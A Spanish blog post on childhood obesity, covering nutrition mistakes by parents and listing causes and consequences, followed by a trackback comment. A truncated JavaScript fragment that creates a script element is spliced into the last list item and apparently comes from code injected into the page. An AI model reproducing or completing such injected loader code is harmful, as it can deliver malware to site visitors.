Salud y belleza » Alimentación, Salud

Obesidad infantil: el coco que acecha a los niños

1 Comentario

obesidad_gordura

Es una regla universal: en presencia de niños pequeños, hasta el más mínimo ejercicio doméstico puede volverse una trampa mortal. Padres del mundo entero pasan horas y horas tratando de hallar correctas medidas de seguridad que logren mantener a sus hijos a salvo de cualquier peligro (…y no hablamos precisamente de “adquirir un nuevo sistema de alarmas” sino de cuestiones mucho más mundanas como esconder objetos cortantes o filosos).

Pero, a menudo, los mayores peligros provienen de las cosas más inofensivas: un plato de comida no adecuada puede causarle a un niño más daño que un par de tijeras.

En fin, es una cuestión seria: actualmente en España un alto porcentaje de niños sufre de sobrepeso y obesidad.

Es un error de los padres comprender la nutrición de sus hijos de acuerdo a su apariencia. La alimentación de los niños, como la de cualquier otro ser humano, no se mide por la cantidad de alimentos sino por la calidad. Muchos padres se desesperan al ver que sus niños se rehusan a comer y así, rápidamente, escogen como solución acercarles los alimentos de su gusto. Esto es otro grave error. Obligatoriamente, la ingesta alimenticia de los niños debe contener varias unidades de hierro, calcio, vitaminas A y D y vitamina C. Además, es importante saber que la obesidad que se manifiesta en la infancia tiende a desarrollarse en la adolescencia, por lo tanto el cuidado del niño en sus primeros años es fundamental” afirma un profesional de la salud.

Al hablar de obesidad infantil, debemos distinguir varias etapas: la primera es el período de 1 a 3 años, luego la denominada edad escolar y finalmente la adolescencia (aquí ya no hablamos de niños sino de adolescentes, es decir, individuos con conciencia propia, por lo cual no incluiremos esta etapa en nuestro estudio por razones obvias: el mismo trata de la obesidad infantil). Si bien a menudo los alimentos de la primera y la segunda etapa pueden variar, existen ciertas propiedades que deben mantenerse: la dieta del niño debe incluir hierro, calcio y vitaminas.

Causas de la obesidad infantil

-Sedentarismo
-Descuido y mal hábito alimentario
-Problemas metabólicos y/o genéticos
-Trastornos psicológicos

Consecuencias de la obesidad infantil

-Complicaciones en huesos y articulaciones
- Madurez prematura: niñas obesas pueden entrar antes en la pubertad, tener ciclos menstruales irregulares.
- Hipertensión y colesterol
- Disturbios hepáticos
- Desánimo, cansancio, depresión, decaimiento.
- Problemas cutáneosvar d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

One Comment »

  • Bitacoras.com said:

    Información Bitacoras.com…

    Valora en Bitacoras.com: Es una regla universal: en presencia de niños pequeños, hasta el más mínimo ejercicio doméstico puede volverse una trampa mortal. Padres del mundo entero pasan horas y horas tratando de hallar correctas medidas de seguridad q…..

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.